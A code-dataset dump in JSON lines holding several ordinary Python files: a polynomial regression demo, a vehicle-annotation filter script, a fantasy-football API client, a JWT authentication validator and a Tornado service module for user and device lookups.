"usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 254, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path", "line_number": 270, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 276, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 292, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 314, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 314, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", 
"line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 325, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 337, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 340, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 341, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 353, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 366, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 366, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}]} +{"seq_id": "347286778", "text": "import warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Pandas read csv file\ndataset = pd.read_csv('G:/projects/mindfitai/datasets/position_salary.csv')\n# Define Features\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# 
Fitting Linear Regression to the dataset\nlr = LinearRegression()\nlr.fit(X, y)\n\n# Fitting Polynomial Regression to the dataset\npr = PolynomialFeatures(degree=4)\nX_pr = pr.fit_transform(X)\nlr_2 = LinearRegression()\nlr_2.fit(X_pr, y)\n\n# Visualising results\nplt.scatter(X, y, color=\"#f44336\")\nplt.plot(X, lr.predict(X), color=\"#8e24aa\", label=\"Linear Regression\")\nplt.plot(X, lr_2.predict(pr.fit_transform(X)), color=\"#29b6f6\", label=\"Polynomial Regression\")\nplt.xlabel(\"Position Level\")\nplt.ylabel(\"Salary\")\nplt.legend(loc=\"best\")\nplt.title(\"Difference between Linear Regression and Polynomial Regression predictions\")\nplt.show()\n\n# Testing\n# Polynomial Regression prediction salary by level (for HR in some company)\nprint(\"Enter feature employee level:\")\nx = input()\nprint('Predict salary from feature employee: {}'\n .format(lr_2.predict(pr.fit_transform(np.array([x]).reshape(1, -1))))\n)", "sub_path": "code/02-Part/polynomial_regression.py", "file_name": "polynomial_regression.py", "file_ext": "py", "file_size_in_byte": 1299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "391688010", "text": "import json\nimport os\n\n# car_class = ['小轿车', '面包车', '货车', '小卡车', '大卡车', 'SUV', '客车', '公交车', '出租车', '垃圾车', '汽油罐车', '渣土车', '渣土车且小卡车', '工程车', '厢式卡车', '洒水车', '水泥罐车', '其他']\nother_car = ['小轿车', '面包车', '货车', '小卡车', '大卡车', 'SUV', '客车', '公交车', '出租车', '垃圾车', '汽油罐车', '工程车', '厢式卡车', '洒水车', '水泥罐车', '其他']\n\nroot = '/Users/yanyan/data/object_detection'\n\ncar_txt = open('other_car.txt', 'w')\nnumber = 0\n\nvideo_images = os.path.join(root, 'images')\nvideo_annos = os.path.join(root, 'annotations')\nvideo_per_annos = os.listdir(video_annos)\nfor anno_file in 
video_per_annos:\n if '.DS_Store' in anno_file:\n continue\n anno_path = os.path.join(video_annos, anno_file)\n\n with open(anno_path, 'r', encoding='utf8') as f:\n json_data = json.load(f)\n # path information of the current image\n img_path = '/'.join(json_data['data']['image_url'].split('/')[-2:])\n\n img_name = img_path.split('/')[1]\n img_infos = json_data['result']['data']\n\n bbox_number = len(img_infos)\n for index, img_info in enumerate(img_infos):\n bbox_label = img_info['label']\n bbox_category = img_info['category']\n category2label = {}\n for category, label in zip(bbox_category, bbox_label):\n category2label[category] = label\n\n if '渣土车' in str(category2label.get('车辆标注-车辆类型', None)) and category2label.get('车辆标注-渣土车是否苫盖', None) is not None:\n break\n elif str(category2label.get('车辆标注-车辆类型', None)) in other_car:\n if index == (bbox_number - 1):\n car_txt.write(f'object_detection/images/{img_name}' + '\\n')\n\n\n\n\n\n\n\n\n", "sub_path": "src/tools/data/提取除了渣土车的其他车类.py", "file_name": "提取除了渣土车的其他车类.py", "file_ext": "py", "file_size_in_byte": 1900, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "330871041", "text": "import requests\nimport json\nimport sys\nimport os.path\nlibdir = os.path.dirname(__file__)\nsys.path.append(os.path.split(libdir)[0])\n\nimport time\n\n\nclass mfl_api():\n def get_league_id_page(self):\n page = None\n try:\n page = requests.get(\n 

\"http://www03.myfantasyleague.com/2017/index?YEAR=2017&SEARCH=dynasty&submit=Go\")\n\n # check that page downloaded correctly\n if str(page.status_code)[0] != str(2):\n raise RuntimeError\n except:\n print(\"Error downloading MFL dynasty league id page.\")\n\n return page.content\n\n def get_league_trades(self, league_id, year=2018):\n # be nice to the servers\n time.sleep(1)\n\n trades_json = None\n try:\n trade_url = \"http://www55.myfantasyleague.com/\" + str(year) + \"/export?TYPE=transactions&L=\" \\\n + str(league_id) + \"&TRANS_TYPE=TRADE&JSON=1\"\n trade_page = requests.get(trade_url)\n if trade_page.status_code > 299 or trade_page.status_code < 200:\n raise RuntimeError\n\n # convert string to json, load trades\n trades_json = json.loads(trade_page.content.decode(\n 'utf-8'))['transactions']['transaction']\n\n # if only one trade from league, still return as list\n if type(trades_json) != list:\n trades_json = [trades_json]\n\n # convert ids to player names\n\n except Exception as e:\n print('Error downloading trades for league:',\n league_id, 'status code:', trade_page.status_code)\n print(e)\n return trades_json\n\n def get_basic_settings(self, league_id, year=2018):\n settings_url = \"http://www.myfantasyleague.com/\" + \\\n str(year) + \"/export?TYPE=league&L=\" + \\\n str(league_id) + \"&APIKEY=&JSON=1\"\n\n try:\n settings_page = requests.get(settings_url)\n if settings_page.status_code > 299 or settings_page.status_code < 200:\n raise RuntimeError\n\n return 
cookie_encoded = self.__get_jwt_from_bearer_jwt(cookie_encoded, \"cookie\")\n # this may raise an ExpiredSignatureError. We check,\n # if the cookies signature is valid\n self.__decode(cookie_encoded, self.environment.get_cookie_key())\n token = self.__decode(token_encoded, self.environment.get_token_key())\n user_id = token.get(USER_ID_PROPERTY)\n if not isinstance(user_id, int):\n raise AuthenticateException(\"user_id is not an int\")\n return user_id\n\n def __assert_instance_of_encoded_jwt(self, jwt: str, name: str = \"jwt\") -> None:\n self.debug_fn(\"Validator.__assert_instance_of_encoded_jwt\")\n if not isinstance(jwt, str):\n error_message = f\"{jwt} is from type {type(jwt)} -- expected: string\"\n self.debug_fn(f\"Throw Error\\n{error_message}\")\n raise InstanceError(error_message)\n\n def __get_jwt_from_bearer_jwt(self, string: str, name: str = \"jwt\") -> str:\n self.debug_fn(\"Validator.__get_jwt_from_bearer_jwt\")\n if not self.__is_bearer(string):\n raise InvalidCredentialsException(f\"Wrong format of {name}: {string}\")\n return string[7:]\n\n def __decode(self, encoded_jwt: str, secret: str) -> Dict:\n self.debug_fn(\"Validator.__decode\")\n return jwt.decode(encoded_jwt, secret, algorithms=[\"HS256\"])\n\n def __is_bearer(self, encoded_jwt: str) -> bool:\n self.debug_fn(\"Validator.__is_bearer\")\n return len(encoded_jwt) >= 7 and encoded_jwt.startswith(\"bearer \")\n\n def __verify_ticket_from_auth_service(\n self, token_encoded: str, cookie_encoded: str\n ) -> Tuple[int, Optional[str]]:\n \"\"\"\n Sends a request to the auth-service configured in the constructor.\n \"\"\"\n self.debug_fn(\"Validator.__verify_ticket_from_auth_service\")\n headers = {HEADER_NAME: token_encoded}\n cookies = {COOKIE_NAME: cookie_encoded}\n response = self.http_handler.send_internal_request(\n \"/authenticate\", headers=headers, cookies=cookies\n )\n if not response.ok:\n self.debug_fn(\n \"Error from auth-service: \" + response.content.decode(\"utf-8\")\n )\n raise AuthenticateException(\n f\"Authentication service sends HTTP {response.status_code}. 
\"\n )\n\n user_id = self.__get_user_id_from_response_body(response.json())\n access_token = response.headers.get(HEADER_NAME, None)\n return user_id, access_token\n\n def __get_user_id_from_response_body(self, response_body) -> int:\n self.debug_fn(\"Validator.__get_user_id_from_response_body\")\n try:\n return response_body[USER_ID_PROPERTY]\n except (TypeError, KeyError) as e:\n raise AuthenticateException(\n f\"Empty or bad response from authentication service: {e}\"\n )\n", "sub_path": "auth/libraries/pip-auth/authlib/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "http_handler.HttpHandler", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": "config.Environment", "line_number": 31, "usage_type": "call"}, {"api_name": "jwt.exceptions", "line_number": 41, "usage_type": "attribute"}, {"api_name": "jwt.exceptions", "line_number": 43, "usage_type": "attribute"}, {"api_name": "exceptions.InvalidCredentialsException", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "constants.USER_ID_PROPERTY", "line_number": 54, "usage_type": "argument"}, {"api_name": "exceptions.AuthenticateException", "line_number": 56, "usage_type": "call"}, {"api_name": "exceptions.InstanceError", "line_number": 64, "usage_type": "call"}, {"api_name": "exceptions.InvalidCredentialsException", "line_number": 69, "usage_type": "call"}, {"api_name": "jwt.decode", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 72, "usage_type": "name"}, {"api_name": "constants.HEADER_NAME", "line_number": 87, "usage_type": "name"}, {"api_name": "constants.COOKIE_NAME", "line_number": 88, "usage_type": "name"}, {"api_name": "exceptions.AuthenticateException", "line_number": 96, "usage_type": "call"}, {"api_name": "constants.HEADER_NAME", "line_number": 101, "usage_type": "argument"}, {"api_name": "typing.Tuple", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "constants.USER_ID_PROPERTY", "line_number": 107, "usage_type": "name"}, {"api_name": "exceptions.AuthenticateException", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "598176230", "text": "import tornado.web\nimport tornado.httpclient\nimport logging\nimport json\nimport base64\n\nimport motor\n\nfrom mickey.commonconf import REDIS_CONTACT_PREFIX, REDIS_AUTH_PREFIX, REDIS_DOMAINKEY_PREFIX\nimport mickey.users\nimport mickey.redis\n\n_logger = logging.getLogger(__name__)\n_api_ver = \"v1\"\n\n_requrest_headers = {\n \"Content-type\" : \"application/json; charset=utf-8\"\n}\n\n\n@tornado.gen.coroutine\ndef getuser(token, provison = False):\n user = None\n userid = None\n\n #decode token\n token_key = \"\"\n try:\n decode_token = base64.b64decode(token[6:])\n strs_list = str(decode_token, encoding = \"utf-8\").split(':')\n if not strs_list:\n return (None, 498)\n\n token_key = strs_list[0]\n except Exception as e:\n _logger.error(\"decode token failed {0}\".format(e))\n return (None, 498)\n\n userid = mickey.redis.read_from_redis(REDIS_AUTH_PREFIX + token_key)\n\n if not userid: \n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = 
\"http://localhost:8083/cxf/security/persons/00000000000\"\n ath_headers = {\n \"Authorization\" : token\n }\n\n res_body = {}\n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = ath_headers, body = None, follow_redirects = True)\n if response.code != 200:\n _logger.error(\"get userinfo %d received session = %s\" % (response.code, token))\n return (userid, response.code)\n\n res_body = json.loads(response.body.decode(\"utf-8\"))\n except Exception as e:\n _logger.error(\"get user info failed {0}\".format(e))\n if e.response:\n return (userid, e.response.code)\n else:\n return (userid, 599)\n\n userid = str(res_body.get(\"userID\", \"\"))\n\n if not userid:\n _logger.error(\"get userid failed session = %s\" % token)\n return (userid, 500)\n\n _logger.info(\"get user id success token = %s id = %s domain = %s\" % (token, userid, domain))\n #cach token\n mickey.redis.write_to_redis(REDIS_AUTH_PREFIX + token_key, userid, 3600)\n \n #do the local provision\n #yield mickey.users.local_provision(userid, token)\n\n if provison:\n _logger.info(\"begin to provision %s with token %s\" % (userid, token))\n yield mickey.users.local_provision(userid, token)\n yield mickey.users.refresh_logintime_of_contact(userid)\n \n return (userid, 200) \n\n@tornado.gen.coroutine\ndef getcontact(contactid, token = None, forcedb = False):\n redis_contact_key = REDIS_CONTACT_PREFIX + contactid\n contact_info = None\n unpack_contact_info = {}\n\n if not contactid:\n return unpack_contact_info\n\n #read contact from redis first\n if forcedb:\n mickey.redis.remove_from_redis(redis_contact_key)\n else:\n contact_info = mickey.redis.read_from_redis(redis_contact_key)\n\n if contact_info:\n try:\n unpack_contact_info = json.loads(contact_info)\n return unpack_contact_info\n except Exception as e:\n _logger.error(\"unpack contact failed {0}\".format(e))\n\n #read contact from http\n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/security/contacts/%s\" % contactid\n\n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = None, body = None)\n if response.code != 200:\n _logger.error(\"get contactinfo failed userid = %s\" % contactid)\n return unpack_contact_info\n unpack_contact_info = json.loads(response.body.decode(\"utf-8\"))\n except Exception as e:\n _logger.error(\"get userinfo failed {0}\".format(e))\n\n #cache the contact information\n if unpack_contact_info:\n dump_contact = json.dumps(unpack_contact_info)\n mickey.redis.write_to_redis(redis_contact_key, dump_contact)\n\n return unpack_contact_info\n\n@tornado.gen.coroutine\ndef getdomain(contactid):\n redis_domian_key = REDIS_DOMAINKEY_PREFIX + contactid\n domain_info = None\n if not contactid:\n return domain_info\n\n domain_info = mickey.redis.read_from_redis(redis_domian_key)\n if domain_info:\n return domain_info\n\n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/security/contacts/%s\" % contactid\n \n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = None, body = None)\n if response.code != 200:\n _logger.error(\"get domaininfo failed userid = %s\" % contactid)\n return domain_info\n unpack_contact_info = json.loads(response.body.decode(\"utf-8\"))\n domain_info = unpack_contact_info.get(\"domain\", \"\")\n _logger.info(\"getdomain success user %s domain %s\" % (contactid, domain_info))\n mickey.redis.write_to_redis(redis_domian_key, domain_info)\n except Exception as e:\n _logger.error(\"get domaininfo 
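`getcontact` above is a read-through cache: try Redis first, fall back to the HTTP backend on a miss, then write the result back. The same pattern in isolation with the redis-py client (the key prefix, TTL, and `load_from_origin` hook are illustrative assumptions):

```python
# Read-through caching sketch with redis-py.
import json

import redis

REDIS = redis.Redis(host="localhost", port=6379, decode_responses=True)
PREFIX = "contact_"
TTL = 3600  # seconds


def get_cached(contact_id: str, load_from_origin) -> dict:
    key = PREFIX + contact_id
    cached = REDIS.get(key)
    if cached is not None:
        return json.loads(cached)             # cache hit
    value = load_from_origin(contact_id)      # miss: ask the backend
    if value:
        REDIS.setex(key, TTL, json.dumps(value))  # write back with a TTL
    return value
```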
failed {0}\".format(e))\n\n return domain_info\n\ndef getdomain_redis(contactid):\n redis_domian_key = REDIS_DOMAINKEY_PREFIX + contactid\n domain_info = None\n if not contactid:\n return domain_info\n\n domain_info = mickey.redis.read_from_redis(redis_domian_key)\n if domain_info:\n return domain_info\n\n return None\n\ndef remove_users_from_conf(groupid, users):\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/confs2/%s/groupdelmember\" % groupid\n \n ath_headers = {\n \"Content-Type\" : \"application/json\"\n }\n\n str_body = json.dumps(users)\n try:\n http_client.fetch(url, None, method='POST', headers=ath_headers, body=str_body)\n except Exception as e:\n _logger.error(\"remove user failed {0}\".format(e))\n\ndef remove_conference(groupid):\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/confs2/%s/groupDel\" % groupid\n \n try:\n http_client.fetch(url, None, method='DELETE', headers=None, body=None)\n except Exception as e:\n _logger.error(\"remove conference failed {0}\".format(e))\n\n@tornado.gen.coroutine\ndef bindboxtouser(userid, deviceid, role):\n _logger.info(\"bind user %s to device %s as %s\" % (userid, deviceid, role)) \n\n if not userid or not deviceid or not role:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/post\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\": deviceid,\n \"role\":role\n }\n\n request_body = json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"bind user %s to device %s as %s failed %s\" % (userid, deviceid, role, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n@tornado.gen.coroutine\ndef removebind(userid, deviceid, role):\n _logger.info(\"remove bind user %s to device %s as %s\" % (userid, deviceid, role))\n\n if not userid or not deviceid or not role:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/delete\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\":deviceid,\n \"role\":role\n }\n\n request_body = json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"remove bind user %s to device %s as %s failed %s\" % (userid, deviceid, role, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"remove bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n@tornado.gen.coroutine\ndef transferbind(userid, deviceid, role, new_userid):\n _logger.info(\"transfer user %s device %s role %s to %s\" % (userid, deviceid, role, new_userid))\n\n if not userid or not deviceid or not role or not new_userid:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/put\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\":deviceid,\n \"role\":role,\n \"newUserID\": new_userid\n }\n\n request_body = 
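`remove_users_from_conf` and `remove_conference` above call `fetch()` without awaiting the returned `Future`, so the surrounding `try/except` can never observe an HTTP failure. One way to keep the call fire-and-forget while still logging errors is a done-callback on the future (a sketch; `log_errors` and the `_bg` variant name are illustrative):

```python
# Fire-and-forget request whose failures are still logged.
from tornado.httpclient import AsyncHTTPClient


def log_errors(future):
    exc = future.exception()
    if exc is not None:
        print("background request failed:", exc)


async def remove_conference_bg(groupid):
    future = AsyncHTTPClient().fetch(
        "http://localhost:8083/cxf/confs2/%s/groupDel" % groupid,
        method="DELETE",
    )
    future.add_done_callback(log_errors)  # do not await; just observe
```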
json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"transfer user %s device %s role %s to %s failed %s\" % (userid, deviceid, role, new_userid, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"remove bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n", "sub_path": "libs/mickey/userfetcher.py", "file_name": "userfetcher.py", "file_ext": "py", "file_size_in_byte": 9264, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 29, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 39, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 39, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 39, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_AUTH_PREFIX", "line_number": 39, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 42, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 42, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 71, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 71, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 71, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_AUTH_PREFIX", "line_number": 71, "usage_type": "name"}, {"api_name": "mickey.commonconf.users.local_provision", "line_number": 78, "usage_type": "call"}, {"api_name": "mickey.commonconf.users", "line_number": 78, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 78, "usage_type": "name"}, {"api_name": "mickey.commonconf.users.refresh_logintime_of_contact", "line_number": 79, "usage_type": "call"}, {"api_name": "mickey.commonconf.users", "line_number": 79, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 79, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 21, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_CONTACT_PREFIX", "line_number": 85, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.remove_from_redis", "line_number": 94, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 94, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 94, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 96, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 96, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 100, "usage_type": "call"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 106, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 106, "usage_type": "name"}, {"api_name": "json.loads", 
